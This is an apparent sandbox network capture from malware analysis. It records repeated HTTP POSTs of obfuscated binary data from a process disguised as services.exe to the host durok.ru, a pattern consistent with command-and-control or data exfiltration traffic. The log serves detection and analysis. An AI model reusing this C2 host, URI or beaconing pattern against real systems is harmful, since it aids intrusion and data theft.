                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTlIGtQKDdl04qQ5eFZ6MPhgNOHJdDZYNobO0LyVbS4q1KonA6UeUfCl40OpABw6nLxBvV5afOcQGbWsUF6ldFHhwlswpkL4KF4ghDOfe7mnY%2By2yjYtWXbqcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263b84df6de99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6388&min_rtt=1687&rtt_var=10035&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=37152&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 2a 39 3c 0a 37 02 23 0d 28 03 3d 0e 29 32 2d 5d 3c 31 31 59 2b 11 2e 55 3c 06 23 18 23 04 21 04 3d 3a 38 13 31 08 26 12 25 1b 2e 5c 05 1d 24 04 2b 05 0e 5e 24 22 36 07 29 10 26 40 2a 3e 26 03 33 3f 34 00 37 02 2a 5e 20 22 3b 03 2c 02 02 5a 3a 3f 20 59 2a 30 31 04 22 17 21 51 0c 1f 38 1e 22 17 3b 13 26 58 29 1f 22 09 2b 56 32 38 36 1e 35 3b 2b 57 24 3a 38 01 26 0a 20 0a 20 2d 0d 54 2b 13 25 01 25 3c 3a 02 3d 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$*9<7#(=)2-]<11Y+.U<##!=:81&%.\$+^$"6)&@*>&3?47*^ ";,Z:? Y*01"!Q8";&X)"+V2865;+W$:8& -T+%%<:=%^-#T>TV0
                                                                                                                              Dec 26, 2024 17:18:55.830271006 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:56.163384914 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:56.165584087 CET2548OUTData Raw: 5c 59 5e 51 54 5f 59 55 5e 58 52 54 56 5f 58 5b 54 57 5b 58 56 52 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^QT_YU^XRTV_X[TW[XVRSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[+10[?*&6".-)P)'!047<,U4[,9 C? \)"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:56.649712086 CET799INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:56 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEqPemj%2BAzBRCF54r3Gxy0mNkCweoVbhdKrDgTdshbrPNgd0U2UzR7jPMN20bsvkadpUEBaQ5MA3Qrno8AqYvFv9zrYTKPbyl6DGKi%2BuYxfpajJrAtJwHD7Dzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263bbfa2dde99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9901&min_rtt=1600&rtt_var=14754&sent=9&recv=13&lost=0&retrans=0&sent_bytes=992&recv_bytes=5278&delivery_rate=1795817&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              100192.168.2.449960104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:56.690002918 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:57.036798000 CET2128OUTData Raw: 59 59 5e 5b 51 58 5c 57 5e 58 52 54 56 5c 58 52 54 51 5b 5d 56 54 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^[QX\W^XRTV\XRTQ[]VTSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<!'>)9Q52+/V)_'?X <P49994A(3=5"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:18:57.867057085 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:58.146224976 CET945INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vg4ocqHNdvL7jyd5IkjEXXDPGoU4t943vjqYRsXU3SMuVJ0YmwY4bdYSVa%2FMWCnJ7tpOv9ZTK3la9yznC%2FFsWc3YJNsFYkNT1czwOcsLEEO1AoLQipYpfGnWiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263c6a88e6a5e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=10198&min_rtt=1619&rtt_var=17766&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=20780&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 29 5f 30 09 37 2c 34 54 28 3e 3a 14 28 31 39 5c 3c 0c 25 5c 2b 2c 3e 54 3f 28 2b 18 37 3a 26 5d 3d 39 2c 5c 26 26 31 05 26 21 2e 5c 05 1d 24 02 3c 28 20 13 33 32 26 07 2b 2d 2e 05 3e 07 3d 16 30 01 20 05 34 2b 08 5d 22 31 3f 03 38 12 30 5a 3a 05 33 00 28 33 3d 00 35 3d 21 51 0c 1f 38 11 23 29 2b 11 27 3e 3a 0e 21 56 3c 0d 32 28 2d 0a 35 38 2b 56 24 29 33 11 25 23 09 55 34 13 09 52 3f 3d 39 06 24 2f 39 58 3e 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$)_07,4T(>:(19\<%\+,>T?(+7:&]=9,\&&1&!.\$<( 32&+-.>=0 4+]"1?80Z:3(3=5=!Q8#)+'>:!V<2(-58+V$)3%#U4R?=9$/9X>9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              101192.168.2.449961104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:56.887049913 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2544
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:57.240035057 CET2544OUTData Raw: 59 5e 5e 51 54 55 59 57 5e 58 52 54 56 59 58 54 54 53 5b 5c 56 54 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y^^QTUYW^XRTVYXTTS[\VTSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<"(?:&#"_8='._%$(4? Q 2Z,9#?# =5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:58.067847013 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:58.325517893 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:58 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7YRFVLRHZsEkbH6UTqFl6spW5bYpbeam%2Bd9XG39%2BsctsJIPTeXyl%2FDwGDrtEUfy4cyAwlTx1lZEY2ekQtk5YzJxC5L96R1071Lg24rF4dgAKSg8j2kPWuuBJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263c7e9394276-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4504&min_rtt=1595&rtt_var=6417&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=58700&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              102192.168.2.449966104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:58.563220024 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:58.911910057 CET2548OUTData Raw: 59 50 5e 5b 51 5b 5c 56 5e 58 52 54 56 5f 58 5a 54 50 5b 5e 56 54 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^[Q[\V^XRTV_XZTP[^VTSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z?3<%5+8*4!%$[#<P ,X-3+ ,\*5"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:59.740767002 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:00.235456944 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:59 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvx3byKaAiyAGfzIpqTV150ADrnusBF8Xrn221WUA9G3RvYlqYTxhrcjqO8UViAXCWh4qu7aadHGu%2Fbs0JOVrMdQk8X8ggOs%2Fg%2F1a4UNHwhLJ3OoFWfVzsX2XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263d25c5c0f37-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4501&min_rtt=1735&rtt_var=6184&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=61167&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:19:00.235574961 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:59 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvx3byKaAiyAGfzIpqTV150ADrnusBF8Xrn221WUA9G3RvYlqYTxhrcjqO8UViAXCWh4qu7aadHGu%2Fbs0JOVrMdQk8X8ggOs%2Fg%2F1a4UNHwhLJ3OoFWfVzsX2XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263d25c5c0f37-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4501&min_rtt=1735&rtt_var=6184&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=61167&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              103192.168.2.449968104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:58.987138987 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:59.333756924 CET2128OUTData Raw: 59 5a 5e 51 51 5b 59 57 5e 58 52 54 56 5c 58 56 54 57 5b 54 56 54 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ^QQ[YW^XRTV\XVTW[TVTSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z<20^<:)"1'81=*[%7; ",:4E<0_)"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:19:00.235542059 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:00.417484045 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EKVprfiuGN3pWkdgBJ0Y1pfC6GXSSp18hjIXqsnMDZgIoAw2jSsBnvWv%2Bkol5aLhzc0SomWC%2FGRaZwqoRDix2K8PpyXB0%2FnyF%2Bl%2FQ6m6QwhVriKO8Gjg38Img%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263d4fc8b4396-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4279&min_rtt=1735&rtt_var=5740&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=66084&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5d 29 07 2c 0f 37 3c 02 56 3f 2e 26 1b 2a 21 3a 06 3c 0b 26 01 28 01 0c 10 2b 06 05 50 37 5c 35 03 3d 29 24 13 25 18 00 5c 32 0b 2e 5c 05 1d 27 5b 2b 2b 2b 06 33 0c 2d 59 3d 00 22 42 3d 2e 3d 5b 24 2f 24 03 20 15 0c 16 37 32 20 58 2f 12 34 59 2d 3c 20 1d 2a 20 32 1f 21 17 21 51 0c 1f 38 57 21 29 01 12 32 2d 29 57 22 0e 2b 12 26 01 3a 57 23 2b 0d 13 30 14 0e 01 27 23 05 55 22 3d 06 0c 3f 03 2a 5b 25 3f 0f 12 29 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$]),7<V?.&*!:<&(+P7\5=)$%\2.\'[+++3-Y="B=.=[$/$ 72 X/4Y-< * 2!!Q8W!)2-)W"+&:W#+0'#U"=?*[%?)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              104192.168.2.449971104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:19:00.483310938 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:19:00.833734035 CET2548OUTData Raw: 59 51 5b 5c 51 5c 5c 51 5e 58 52 54 56 50 58 52 54 5d 5b 5e 56 5e 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ[\Q\\Q^XRTVPXRT][^V^S[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$(#+:&52^/-5W>'&[3B$7,,#?1-7?3*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:19:01.661772966 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:01.913671017 CET804INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:01 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzLUp8e%2BkfEsapdqma8%2BXozXJOg2HQlrjn%2F8inSE0Mrv7IlOjVAM8J5GkaDPpWgiLCbr%2Bih3MKnyOv1xpouDLYeIo4vyDWTxA7b7PZE76diadqeOz%2BGUd%2FDr%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263de59964414-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4642&min_rtt=1738&rtt_var=6460&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=58467&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              105192.168.2.449974104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:19:01.236841917 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:19:01.588527918 CET2128OUTData Raw: 5c 5a 5b 5c 51 5b 59 55 5e 58 52 54 56 5e 58 51 54 53 5b 55 56 56 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Z[\Q[YU^XRTV^XQTS[UVVSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[<1+9#2<,.6?'&0?4<P7!.)4E(\>%"Z.#Z*
                                                                                                                              Dec 26, 2024 17:19:02.417151928 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:02.697639942 CET947INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fSdY7at1ZMD3frtRd9Sge2s4UV6j6c%2FFgZUelSwFrusc9LMn%2Fj7cMFv4V159q2rH2vEbqiuNZ4g1QnZA3SgbYmE8FY4CuytauyOVkmGCGbRyu2%2BWdOjv4OkLJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263e31aec8c69-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=10195&min_rtt=4331&rtt_var=13353&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=28489&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 01 3d 2a 3b 56 37 02 2c 1c 3f 04 3e 53 3d 31 25 14 3c 0b 32 07 28 2f 2e 1f 2a 3b 2f 18 20 3a 29 00 2a 03 2c 5c 25 18 35 05 32 0b 2e 5c 05 1d 27 5d 2b 2b 02 12 30 32 0f 5a 3e 2e 26 43 28 3d 21 18 27 2c 2c 01 37 15 2d 02 23 31 06 11 38 12 24 1d 3a 05 3f 00 3f 20 0c 5b 35 3d 21 51 0c 1f 38 53 35 39 28 03 26 58 3a 0e 35 30 37 56 25 16 00 57 22 38 3c 0f 33 2a 2f 59 26 33 23 54 23 3d 33 53 2a 2e 32 10 26 2c 29 5c 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'=*;V7,?>S=1%<2(/.*;/ :)*,\%52.\']++02Z>.&C(=!',,7-#18$:?? [5=!Q8S59(&X:507V%W"8<3*/Y&3#T#=3S*.2&,)\+)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              106192.168.2.449976104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:19:02.495732069 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:19:02.849327087 CET2548OUTData Raw: 59 58 5b 5f 54 55 59 57 5e 58 52 54 56 51 58 50 54 53 5b 5e 56 5f 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
